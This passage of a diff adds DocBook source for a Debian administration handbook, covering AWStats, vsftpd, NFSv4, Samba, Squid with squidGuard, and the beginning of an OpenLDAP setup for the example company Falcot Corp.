+Include "/etc/awstats/awstats.conf"
+SiteDomain="www.falcot.org"
+HostAliases="falcot.org"
+</programlisting>
+
+			</example>
+			 <para>
+				AWStats uses many icons stored in the <filename>/usr/share/awstats/icon/</filename> directory. In order for these icons to be available on the web site, the Apache configuration needs to be adapted to include the following directive:
+			</para>
+			 
+<programlisting>
+Alias /awstats-icon/ /usr/share/awstats/icon/
+</programlisting>
+			 <para>
+				After a few minutes (and once the script has been run a few times), the results are available online: <ulink type="block" url="http://www.falcot.com/cgi-bin/awstats.pl" /><ulink type="block" url="http://www.falcot.org/cgi-bin/awstats.pl" />
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Log file rotation</title>
+			 <para>
+				In order for the statistics to take all the logs into account, <emphasis>AWStats</emphasis> needs to be run right before the Apache log files are rotated. Looking at the <literal>prerotate</literal> directive of <filename>/etc/logrotate.d/apache2</filename> file, this can be solved by putting a symlink to <filename>/usr/share/awstats/tools/update.sh</filename> in <filename>/etc/logrotate.d/httpd-prerotate</filename>:
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>cat /etc/logrotate.d/apache2
+</userinput><computeroutput>/var/log/apache2/*.log {
+  daily
+  missingok
+  rotate 14
+  compress
+  delaycompress
+  notifempty
+  create 644 root adm
+  sharedscripts
+  postrotate
+    if /etc/init.d/apache2 status &gt; /dev/null ; then \
+      /etc/init.d/apache2 reload &gt; /dev/null; \
+    fi;
+  endscript
+  prerotate
+    if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
+      run-parts /etc/logrotate.d/httpd-prerotate; \
+    fi; \
+  endscript
+}
+$ </computeroutput><userinput>sudo mkdir -p /etc/logrotate.d/httpd-prerotate
+</userinput><computeroutput>$ </computeroutput><userinput>sudo ln -sf /usr/share/awstats/tools/update.sh \
+  /etc/logrotate.d/httpd-prerotate/awstats
+</userinput></screen>
+			 <para>
+				Note also that the log files created by <command>logrotate</command> need to be readable by everyone, especially AWStats. In the above example, this is ensured by the <literal>create 644 root adm</literal> line (instead of the default <literal>640</literal> permissions).
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.ftp-file-server">
+		<title>FTP File Server</title>
+		 <indexterm>
+			<primary>FTP (<emphasis>File Transfer Protocol</emphasis>)</primary>
+		</indexterm>
+		 <para>
+			FTP (<emphasis>File Transfer Protocol</emphasis>) is one of the first protocols of the Internet (RFC 959 was issued in 1985!). It was used to distribute files before the Web was even born (the HTTP protocol was created in 1990, and formally defined in its 1.0 version by RFC 1945, issued in 1996).
+		</para>
+		 <para>
+			This protocol allows both file uploads and file downloads; for this reason, it is still widely used to deploy updates to a website hosted by one's Internet service provider (or any other entity hosting websites). In these cases, secure access is enforced with a user identifier and password; on successful authentication, the FTP server grants read-write access to that user's home directory.
+		</para>
+		 <para>
+			Other FTP servers are mainly used to distribute files for public downloading; Debian packages are a good example. The contents of these servers is fetched from other, geographically remote, servers; it is then made available to less distant users. This means that client authentication is not required; as a consequence, this operating mode is known as “anonymous FTP”. To be perfectly correct, the clients do authenticate with the <literal>anonymous</literal> username; the password is often, by convention, the user's email address, but the server ignores it.
+		</para>
+		 <para>
+			Many FTP servers are available in Debian (<emphasis role="pkg">ftpd</emphasis>, <emphasis role="pkg">proftpd-basic</emphasis>, <emphasis role="pkg">pyftpd</emphasis> and so on). The Falcot Corp administrators picked <emphasis role="pkg">vsftpd</emphasis> because they only use the FTP server to distribute a few files (including a Debian package repository); since they don't need advanced features, they chose to focus on the security aspects.
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">vsftpd</emphasis></primary>
+		</indexterm>
+		 <para>
+			Installing the package creates an <literal>ftp</literal> system user. This account is always used for anonymous FTP connections, and its home directory (<filename>/srv/ftp/</filename>) is the root of the tree made available to users connecting to this service. The default configuration (in <filename>/etc/vsftpd.conf</filename>) requires some changes to cater to the simple need of making big files available for public downloads: anonymous access needs to be enabled (<literal>anonymous_enable=YES</literal>) and read-only access of local users needs to be disabled (<literal>local_enable=NO</literal>). The latter is particularly important since the FTP protocol doesn't use any form of encryption and the user password could be intercepted over the wire.
+		</para>
+
+	</section>
+	 <section id="sect.nfs-file-server">
+		<title>NFS File Server</title>
+		 <para>
+			NFS (<emphasis>Network File System</emphasis>) is a protocol allowing remote access to a filesystem through the network. All Unix systems can work with this protocol; when Windows systems are involved, Samba must be used instead.
+		</para>
+		 <indexterm>
+			<primary>NFS</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>Network</emphasis></primary>
+			<secondary><emphasis>File System</emphasis></secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>filesystem</primary>
+			<secondary>network</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>file</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>server</primary>
+			<secondary>file</secondary>
+		</indexterm>
+		 <para>
+			NFS is a very useful tool but, historically, it has suffered from many limitations, most of which have been addressed with version 4 of the protocol. The downside is that the latest version of NFS is harder to configure when you want to make use of basic security features such as authentication and encryption since it relies on Kerberos for those parts. And without those, the NFS protocol must be restricted to a trusted local network since data goes over the network unencrypted (a <emphasis>sniffer</emphasis> can intercept it) and access rights are granted based on the client's IP address (which can be spoofed).
+		</para>
+		 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> NFS HOWTO</title>
+		 <para>
+			Good documentation to deploy NFSv4 is rather scarce. Here are some pointers with content of varying quality but that should at least give some hints on what should be done. <ulink type="block" url="https://help.ubuntu.com/community/NFSv4Howto" /> <ulink type="block" url="http://wiki.linux-nfs.org/wiki/index.php/Nfsv4_configuration" />
+		</para>
+		 </sidebar> <section>
+			<title>Securing NFS</title>
+			 <indexterm>
+				<primary>NFS</primary>
+				<secondary>security</secondary>
+			</indexterm>
+			 <para>
+				If you don't use the Kerberos-based security features, it is vital to ensure that only the machines allowed to use NFS can connect to the various required RPC servers, because the basic protocol trusts the data received from the network. The firewall must also block <emphasis>IP spoofing</emphasis> so as to prevent an outside machine from acting as an inside one, and access to the appropriate ports must be restricted to the machines meant to access the NFS shares.
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> RPC</title>
+			 <para>
+				RPC (<emphasis>Remote Procedure Call</emphasis>) is a Unix standard for remote services. NFS is one such service.
+			</para>
+			 <indexterm>
+				<primary>RPC</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>Remote Procedure Call</emphasis></primary>
+			</indexterm>
+			 <para>
+				RPC services register to a directory known as the <emphasis>portmapper</emphasis>. A client wishing to perform an NFS query first addresses the <emphasis>portmapper</emphasis> (on port 111, either TCP or UDP), and asks for the NFS server; the reply usually mentions port 2049 (the default for NFS). Not all RPC services necessarily use a fixed port.
+			</para>
+			 </sidebar> <para>
+				Older versions of the protocol required other RPC services which used dynamically assigned ports. Fortunately, with NFS version 4, only port 2049 (for NFS) and 111 (for the portmapper) are needed and they are thus easy to firewall.
+			</para>
+			 <indexterm>
+				<primary><command>portmapper</command></primary>
+			</indexterm>
+
+		</section>
+		 <section>
+			<title>NFS Server</title>
+			 <para>
+				The NFS server is part of the Linux kernel; in kernels provided by Debian it is built as a kernel module. If the NFS server is to be run automatically on boot, the <emphasis role="pkg">nfs-kernel-server</emphasis> package should be installed; it contains the relevant start-up scripts.
+			</para>
+			 <para>
+				The NFS server configuration file, <filename>/etc/exports</filename>, lists the directories that are made available over the network (<emphasis>exported</emphasis>). For each NFS share, only the given list of machines is granted access. More fine-grained access control can be obtained with a few options. The syntax for this file is quite simple:
+			</para>
+			 <indexterm>
+				<primary><filename>exports</filename></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><filename>/etc/exports</filename></primary>
+			</indexterm>
+			 
+<programlisting>
+/directory/to/share machine1(option1,option2,...) machine2(...) ...
+</programlisting>
+			 <para>
+				Note that with NFSv4, all exported directories must be part of a single hierarchy and that the root directory of that hierarchy must be exported and identified with the option <literal>fsid=0</literal> or <literal>fsid=root</literal>.
+			</para>
+			 <para>
+				Each machine can be identified either by its DNS name or its IP address. Whole sets of machines can also be specified using either a syntax such as <literal>*.falcot.com</literal> or an IP address range such as <literal>192.168.0.0/255.255.255.0</literal> or <literal>192.168.0.0/24</literal>.
+			</para>
+			 <para>
+				Directories are made available as read-only by default (or with the <literal>ro</literal> option). The <literal>rw</literal> option allows read-write access. NFS clients typically connect from a port restricted to root (in other words, below 1024); this restriction can be lifted by the <literal>insecure</literal> option (the <literal>secure</literal> option is implicit, but it can be made explicit if needed for clarity).
+			</para>
+			 <indexterm>
+				<primary>NFS</primary>
+				<secondary>options</secondary>
+			</indexterm>
+			 <para>
+				By default, the server only answers an NFS query when the current disk operation is complete (<literal>sync</literal> option); this can be disabled with the <literal>async</literal> option. Asynchronous writes increase performance a bit, but they decrease reliability since there is a data loss risk in case of the server crashing between the acknowledgment of the write and the actual write on disk. Since the default value changed recently (as compared to the historical value of NFS), an explicit setting is recommended.
+			</para>
+			 <para>
+				In order to not give root access to the filesystem to any NFS client, all queries appearing to come from a root user are considered by the server as coming from the <literal>nobody</literal> user. This behavior corresponds to the <literal>root_squash</literal> option, and is enabled by default. The <literal>no_root_squash</literal> option, which disables this behavior, is risky and should only be used in controlled environments. The <literal>anonuid=<replaceable>uid</replaceable></literal> and <literal>anongid=<replaceable>gid</replaceable></literal> options allow specifying another fake user to be used instead of UID/GID 65534 (which corresponds to user <literal>nobody</literal> and group <literal>nogroup</literal>).
+			</para>
+			 <para>
+				With NFSv4, you can add a <literal>sec</literal> option to indicate the security level that you want: <literal>sec=sys</literal> is the default with no special security features, <literal>sec=krb5</literal> enables authentication only, <literal>sec=krb5i</literal> adds integrity protection, and <literal>sec=krb5p</literal> is the most complete level which includes privacy protection (with data encryption). For this to work you need a working Kerberos setup (that service is not covered by this book).
+			</para>
+			 <para>
+				Other options are available; they are documented in the <citerefentry><refentrytitle>exports</refentrytitle>
+				 <manvolnum>5</manvolnum></citerefentry> manual page.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> First installation</title>
+			 <para>
+				The <filename>/etc/init.d/nfs-kernel-server</filename> boot script only starts the server if the <filename>/etc/exports</filename> lists one or more valid NFS shares. On initial configuration, once this file has been edited to contain valid entries, the NFS server must therefore be started with the following command:
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>service nfs-kernel-server start</userinput></screen>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>NFS Client</title>
+			 <indexterm>
+				<primary>client</primary>
+				<secondary>NFS</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>NFS</primary>
+				<secondary>client</secondary>
+			</indexterm>
+			 <para>
+				As with other filesystems, integrating an NFS share into the system hierarchy requires mounting. Since this filesystem has its peculiarities, a few adjustments were required in the syntaxes of the <command>mount</command> command and the <filename>/etc/fstab</filename> file.
+			</para>
+			 <example>
+				<title>Manually mounting with the <command>mount</command> command</title>
+				 
+<screen>
+          <computeroutput># </computeroutput><userinput>mount -t nfs4 -o rw,nosuid arrakis.internal.falcot.com:/shared /srv/shared</userinput></screen>
+
+			</example>
+			 <example>
+				<title>NFS entry in the <filename>/etc/fstab</filename> file</title>
+				 
+<programlisting>
+arrakis.internal.falcot.com:/shared /srv/shared nfs4 rw,nosuid 0 0
+</programlisting>
+
+			</example>
+			 <para>
+				The entry described above mounts, at system startup, the <filename>/shared/</filename> NFS directory from the <literal>arrakis</literal> server into the local <filename>/srv/shared/</filename> directory. Read-write access is requested (hence the <literal>rw</literal> parameter). The <literal>nosuid</literal> option is a protection measure that wipes any <literal>setuid</literal> or <literal>setgid</literal> bit from programs stored on the share. If the NFS share is only meant to store documents, another recommended option is <literal>noexec</literal>, which prevents executing programs stored on the share. Note that on the server, the <filename>shared</filename> directory is below the NFSv4 root export (for example <filename>/export/shared</filename>), it is not a top-level directory.
+			</para>
+			 <para>
+				The <citerefentry><refentrytitle>nfs</refentrytitle>
+				 <manvolnum>5</manvolnum></citerefentry> manual page describes all the options in some detail.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.windows-file-server-with-samba">
+		<title>Setting Up Windows Shares with Samba</title>
+		 <para>
+			Samba is a suite of tools handling the SMB protocol (also known as “CIFS”) on Linux. This protocol is used by Windows for network shares and shared printers.
+		</para>
+		 <indexterm>
+			<primary>Windows share</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Samba</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>SMB</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>CIFS</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>server</primary>
+			<secondary>file</secondary>
+		</indexterm>
+		 <para>
+			Samba can also act as an Windows domain controller. This is an outstanding tool for ensuring seamless integration of Linux servers and the office desktop machines still running Windows.
+		</para>
+		 <section>
+			<title>Samba Server</title>
+			 <para>
+				The <emphasis role="pkg">samba</emphasis> package contains the main two servers of Samba 4, <command>smbd</command> and <command>nmbd</command>.
+			</para>
+			 <indexterm>
+				<primary><command>smbd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>nmbd</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> Going further</title>
+			 <para>
+				The Samba server is extremely configurable and versatile, and can address a great many different use cases matching very different requirements and network architectures. This book only focuses on the use case where Samba is used as a standalone server, but it can also be a NT4 Domain Controller or a full Active Directory Domain Controller, or a simple member of an existing domain (which could be a managed by a Windows server).
+			</para>
+			 <indexterm>
+				<primary>domain controller</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Windows domain</primary>
+			</indexterm>
+			 <para>
+				The <emphasis role="pkg">samba-doc</emphasis> package contains a wealth of commented example files in <filename>/usr/share/doc/samba-doc/examples/</filename>.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>TOOL</emphasis> Authenticating with a Windows Server</title>
+			 <para>
+				Winbind gives system administrators the option of using a Windows server as an authentication server. Winbind also integrates cleanly with PAM and NSS. This allows setting up Linux machines where all users of a Windows domain automatically get an account.
+			</para>
+			 <indexterm>
+				<primary>Winbind</primary>
+			</indexterm>
+			 <para>
+				More information can be found in the <filename>/usr/share/doc/samba-doc/examples/pam_winbind/</filename> directory.
+			</para>
+			 </sidebar> <section>
+				<title>Configuring with <command>debconf</command></title>
+				 <para>
+					The package sets up a minimal configuration during the initial installation but you should really run <command>dpkg-reconfigure samba-common</command> to adapt it:
+				</para>
+				 <para>
+					The first piece of required information is the name of the workgroup where the Samba server will belong (the answer is <literal>FALCOTNET</literal> in our case).
+				</para>
+				 <para>
+					The package also proposes identifying the WINS server from the information provided by the DHCP daemon. The Falcot Corp administrators rejected this option, since they intend to use the Samba server itself as the WINS server.
+				</para>
+				 <indexterm>
+					<primary>WINS</primary>
+				</indexterm>
+
+			</section>
+			 <section>
+				<title>Configuring Manually</title>
+				 <section>
+					<title>Changes to <filename>smb.conf</filename></title>
+					 <para>
+						The requirements at Falcot require other options to be modified in the <filename>/etc/samba/smb.conf</filename> configuration file. The following excerpts summarize the changes that were effected in the <literal>[global]</literal> section.
+					</para>
+					 
+<programlisting>
+[global]
+
+## Browsing/Identification ###
+
+# Change this to the workgroup/NT-domain name your Samba server will part of
+   workgroup = FALCOTNET
+
+# Windows Internet Name Serving Support Section:
+# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
+   wins support = yes <co id="smb.conf.wins"></co>
+
+[...]
+
+####### Authentication #######
+
+# Server role. Defines in which mode Samba will operate. Possible
+# values are "standalone server", "member server", "classic primary
+# domain controller", "classic backup domain controller", "active
+# directory domain controller". 
+#
+# Most people will want "standalone sever" or "member server".
+# Running as "active directory domain controller" will require first
+# running "samba-tool domain provision" to wipe databases and create a
+# new domain.
+   server role = standalone server
+
+# "security = user" is always a good idea. This will require a Unix account
+# in this server for every user accessing the server.
+   security = user <co id="smb.conf.security"></co>
+
+[...]
+</programlisting>
+					 <calloutlist>
+						<callout arearefs="smb.conf.wins">
+							<para>
+								Indicates that Samba should act as a Netbios name server (WINS) for the local network.
+							</para>
+
+						</callout>
+						 <callout arearefs="smb.conf.security">
+							<para>
+								This is the default value for this parameter; however, since it is central to the Samba configuration, filling it explicitly is recommended. Each user must authenticate before accessing any share.
+							</para>
+
+						</callout>
+
+					</calloutlist>
+
+				</section>
+				 <section>
+					<title>Adding Users</title>
+					 <para>
+						Each Samba user needs an account on the server; the Unix accounts must be created first, then the user needs to be registered in Samba's database. The Unix step is done quite normally (using <command>adduser</command> for instance).
+					</para>
+					 <para>
+						Adding an existing user to the Samba database is a matter of running the <command>smbpasswd -a <replaceable>user</replaceable></command> command; this command asks for the password interactively.
+					</para>
+					 <para>
+						A user can be deleted with the <command>smbpasswd -x <replaceable>user</replaceable></command> command. A Samba account can also be temporarily disabled (with <command>smbpasswd -d <replaceable>user</replaceable></command>) and re-enabled later (with <command>smbpasswd -e <replaceable>user</replaceable></command>).
+					</para>
+
+				</section>
+
+			</section>
+
+		</section>
+		 <section>
+			<title>Samba Client</title>
+			 <para>
+				The client features in Samba allow a Linux machine to access Windows shares and shared printers. The required programs are available in the <emphasis role="pkg">cifs-utils</emphasis> and <emphasis role="pkg">smbclient</emphasis> packages.
+			</para>
+			 <indexterm>
+				<primary><emphasis>smbclient</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>cifs-utils</emphasis></primary>
+			</indexterm>
+			 <section>
+				<title>The <command>smbclient</command> Program</title>
+				 <para>
+					The <command>smbclient</command> program queries SMB servers. It accepts a <literal>-U <replaceable>user</replaceable></literal> option, for connecting to the server under a specific identity. <command>smbclient //<replaceable>server</replaceable>/<replaceable>share</replaceable></command> accesses the share in an interactive way similar to the command-line FTP client. <command>smbclient -L <replaceable>server</replaceable></command> lists all available (and visible) shares on a server.
+				</para>
+
+			</section>
+			 <section>
+				<title>Mounting Windows Shares</title>
+				 <para>
+					The <command>mount</command> command allows mounting a Windows share into the Linux filesystem hierarchy (with the help of <command>mount.cifs</command> provided by <emphasis role="pkg">cifs-utils</emphasis>).
+				</para>
+				 <indexterm>
+					<primary><command>mount.cifs</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Windows share, mounting</primary>
+				</indexterm>
+				 <example>
+					<title>Mounting a Windows share</title>
+					 
+<programlisting>
+mount -t cifs //arrakis/shared /shared \
+      -o credentials=/etc/smb-credentials
+</programlisting>
+
+				</example>
+				 <para>
+					The <filename>/etc/smb-credentials</filename> file (which must not be readable by users) has the following format:
+				</para>
+				 
+<programlisting>
+username = <replaceable>user</replaceable>
+password = <replaceable>password</replaceable></programlisting>
+				 <para>
+					Other options can be specified on the command-line; their full list is available in the <citerefentry><refentrytitle>mount.cifs</refentrytitle>
+					 <manvolnum>1</manvolnum></citerefentry> manual page. Two options in particular can be interesting: <literal>uid</literal> and <literal>gid</literal> allow forcing the owner and group of files available on the mount, so as not to restrict access to root.
+				</para>
+				 <para>
+					A mount of a Windows share can also be configured in <filename>/etc/fstab</filename>:
+				</para>
+				 
+<programlisting>
+//<replaceable>server</replaceable>/shared /shared cifs credentials=/etc/smb-credentials
+</programlisting>
+				 <para>
+					Unmounting a SMB/CIFS share is done with the standard <command>umount</command> command.
+				</para>
+
+			</section>
+			 <section>
+				<title>Printing on a Shared Printer</title>
+				 <para>
+					CUPS is an elegant solution for printing from a Linux workstation to a printer shared by a Windows machine. When the <emphasis role="pkg">smbclient</emphasis> is installed, CUPS allows installing Windows shared printers automatically.
+				</para>
+				 <indexterm>
+					<primary>printing</primary>
+					<secondary>network</secondary>
+				</indexterm>
+				 <para>
+					Here are the required steps:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							Enter the CUPS configuration interface: <literal>http://localhost:631/admin</literal>
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Click on “Add Printer”.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Choose the printer device, pick “Windows Printer via SAMBA”.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Enter the connection URI for the network printer. It should look like the following:
+						</para>
+						 <para>
+							<literal>smb://<replaceable>user</replaceable>:<replaceable>password</replaceable>@<replaceable>server</replaceable>/<replaceable>printer</replaceable></literal>.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Enter the name that will uniquely identify this printer. Then enter the description and location of the printer. Those are the strings that will be shown to end users to help them identify the printers.
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Indicate the manufacturer/model of the printer, or directly provide a working printer description file (PPD).
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					Voilà, the printer is operational!
+				</para>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.http-ftp-proxy">
+		<title>HTTP/FTP Proxy</title>
+		 <para>
+			An HTTP/FTP proxy acts as an intermediary for HTTP and/or FTP connections. Its role is twofold:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					Caching: recently downloaded documents are copied locally, which avoids multiple downloads.
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					Filtering server: if use of the proxy is mandated (and outgoing connections are blocked unless they go through the proxy), then the proxy can determine whether or not the request is to be granted.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <indexterm>
+			<primary>HTTP/FTP proxy</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>proxy cache</primary>
+		</indexterm>
+		 <para>
+			Falcot Corp selected Squid as their proxy server.
+		</para>
+		 <indexterm>
+			<primary>Squid</primary>
+		</indexterm>
+		 <section>
+			<title>Installing</title>
+			 <para>
+				The <emphasis role="pkg">squid3</emphasis> Debian package only contains the modular (caching) proxy. Turning it into a filtering server requires installing the additional <emphasis role="pkg">squidguard</emphasis> package. In addition, <emphasis role="pkg">squid-cgi</emphasis> provides a querying and administration interface for a Squid proxy.
+			</para>
+			 <para>
+				Prior to installing, care should be taken to check that the system can identify its own complete name: the <command>hostname -f</command> must return a fully-qualified name (including a domain). If it does not, then the <filename>/etc/hosts</filename> file should be edited to contain the full name of the system (for instance, <literal>arrakis.falcot.com</literal>). The official computer name should be validated with the network administrator in order to avoid potential name conflicts.
+			</para>
+
+		</section>
+		 <section>
+			<title>Configuring a Cache</title>
+			 <para>
+				Enabling the caching server feature is a simple matter of editing the <filename>/etc/squid3/squid.conf</filename> configuration file and allowing machines from the local network to run queries through the proxy. The following example shows the modifications made by the Falcot Corp administrators:
+			</para>
+			 <example>
+				<title>The <filename>/etc/squid3/squid.conf</filename> file (excerpts)</title>
+				 
+<programlisting>
+# INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS
+
+# Example rule allowing access from your local networks. Adapt
+# to list your (internal) IP networks from where browsing should
+# be allowed
+acl our_networks src 192.168.1.0/24 192.168.2.0/24
+http_access allow our_networks
+http_access allow localhost
+# And finally deny all other access to this proxy
+http_access deny all
+</programlisting>
+
+			</example>
+
+		</section>
+		 <section>
+			<title>Configuring a Filter</title>
+			 <para>
+				<command>squid</command> itself does not perform the filtering; this action is delegated to <command>squidGuard</command>. The former must then be configured to interact with the latter. This involves adding the following directive to the <filename>/etc/squid3/squid.conf</filename> file:
+			</para>
+			 <indexterm>
+				<primary><command>squidGuard</command></primary>
+			</indexterm>
+			 
+<programlisting>
+url_rewrite_program /usr/bin/squidGuard -c /etc/squid3/squidGuard.conf
+</programlisting>
+			 <para>
+				The <filename>/usr/lib/cgi-bin/squidGuard.cgi</filename> CGI program also needs to be installed, using <filename>/usr/share/doc/squidguard/examples/squidGuard.cgi.gz</filename> as a starting point. Required modifications to this script are the <varname>$proxy</varname> and <varname>$proxymaster</varname> variables (the name of the proxy and the administrator's contact e-mail, respectively). The <varname>$image</varname> and <varname>$redirect</varname> variables should point to existing images representing the rejection of a query.
+			</para>
+			 <para>
+				The filter is enabled with the <command>service squid3 reload</command> command. However, since the <emphasis role="pkg">squidguard</emphasis> package does no filtering by default, it is the administrator's task to define the policy. This can be done by creating the <filename>/etc/squid3/squidGuard.conf</filename> file (using <filename>/etc/squidguard/squidGuard.conf.default</filename> as template if required).
+			</para>
+			 <para>
+				The working database must be regenerated with <command>update-squidguard</command> after each change of the <command>squidGuard</command> configuration file (or one of the lists of domains or URLs it mentions). The configuration file syntax is documented on the following website: <ulink type="block" url="http://www.squidguard.org/Doc/configure.html" />
+			</para>
+			 <indexterm>
+				<primary><command>update-squidguard</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> DansGuardian</title>
+			 <indexterm>
+				<primary><emphasis role="pkg">dansguardian</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>PICS</primary>
+			</indexterm>
+			 <para>
+				The <emphasis role="pkg">dansguardian</emphasis> package is an alternative to <emphasis>squidguard</emphasis>. This software does not simply handle a blacklist of forbidden URLs, but it can take advantage of the PICS system (<emphasis>Platform for Internet Content Selection</emphasis>) to decide whether a page is acceptable by dynamic analysis of its contents.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.ldap-directory">
+		<title>LDAP Directory</title>
+		 <indexterm>
+			<primary>LDAP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>OpenLDAP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>directory, LDAP</primary>
+		</indexterm>
+		 <para>
+			OpenLDAP is an implementation of the LDAP protocol; in other words, it is a special-purpose database designed for storing directories. In the most common use case, using an LDAP server allows centralizing management of user accounts and the related permissions. Moreover, an LDAP database is easily replicated, which allows setting up multiple synchronized LDAP servers. When the network and the user base grows quickly, the load can then be balanced across several servers.
+		</para>
+		 <para>
+			LDAP data is structured and hierarchical. The structure is defined by “schemas” which describe the kind of objects that the database can store, with a list of all their possible attributes. The syntax used to refer to a particular object in the database is based on this structure, which explains its complexity.
+		</para>
+		 <section>
+			<title>Installing</title>
+			 <para>
+				The <emphasis role="pkg">slapd</emphasis> package contains the OpenLDAP server. The <emphasis role="pkg">ldap-utils</emphasis> package includes command-line tools for interacting with LDAP servers.
+			</para>
+			 <indexterm>
+				<primary><emphasis>slapd</emphasis></primary>
+			</indexterm>
+			 <para>
+				Installing <emphasis role="pkg">slapd</emphasis> usually asks very few questions and the resulting database is unlikely to suit your needs. Fortunately a simple <command>dpkg-reconfigure slapd</command> will let you reconfigure the LDAP database with more details:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						Omit OpenLDAP server configuration? No, of course, we want to configure this service.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						DNS domain name: “<literal>falcot.com</literal>”.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Organization name: “Falcot Corp”.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						An administrative passwords needs to be typed in.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Database backend to use: “MDB”.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Do you want the database to be removed when <emphasis role="pkg">slapd</emphasis> is purged? No. No point in risking losing the database in case of a mistake.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Move old database? This question is only asked when the configuration is attempted while a database already exists. Only answer “yes” if you actually want to start again from a clean database, for instance if you run <command>dpkg-reconfigure slapd</command> right after the initial installation.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Allow LDAPv2 protocol? No, there is no point in that. All the tools we are going to use understand the LDAPv3 protocol.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> LDIF format</title>
+			 <para>
+				An LDIF file (<emphasis>LDAP Data Interchange Format</emphasis>) is a portable text file describing the contents of an LDAP database (or a portion thereof); this can then be used to inject the data into any other LDAP server.
+			</para>
+			 <indexterm>
+				<primary>LDIF</primary>
+			</indexterm>
+			 </sidebar> <para>
+				A minimal database is now configured, as demonstrated by the following query:
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>ldapsearch -x -b dc=falcot,dc=com</userinput>
+<computeroutput># extended LDIF
+#
+# LDAPv3
+# base &lt;dc=falcot,dc=com&gt; with scope sub
+# filter: (objectclass=*)
+# requesting: ALL
+#
+
+# falcot.com
+dn: dc=falcot,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Falcot Corp
+dc: falcot
+
+# admin, falcot.com
+dn: cn=admin,dc=falcot,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: LDAP administrator
+
+# search result
+search: 2
+result: 0 Success
+
+# numResponses: 3
+# numEntries: 2
+</computeroutput></screen>
+			 <para>
+				The query returned two objects: the organization itself, and the administrative user.
+			</para>
+
+		</section>
+		 <section>
+			<title>Filling in the Directory</title>
+			 <para>
+				Since an empty database is not particularly useful, we are going to inject into it all the existing directories; this includes the users, groups, services and hosts databases.
+			</para>
+			 <para>
+				The <emphasis role="pkg">migrationtools</emphasis> package provides a set of scripts dedicated to extract data from the standard Unix directories (<filename>/etc/passwd</filename>, <filename>/etc/group</filename>, <filename>/etc/services</filename>, <filename>/etc/hosts</filename> and so on), convert this data, and inject it into the LDAP database.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">migrationtools</emphasis></primary>
+			</indexterm>
+			 <para>
+				Once the package is installed, the <filename>/etc/migrationtools/migrate_common.ph</filename> must be edited; the <varname>IGNORE_UID_BELOW</varname> and <varname>IGNORE_GID_BELOW</varname> options need to be enabled (uncommenting them is enough), and <varname>DEFAULT_MAIL_DOMAIN</varname>/<varname>DEFAULT_BASE</varname> need to be updated.
+			</para>
+			 <para>
+				The actual migration operation is handled by the <command>migrate_all_online.sh</command> command, as follows:
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>cd /usr/share/migrationtools</userinput>
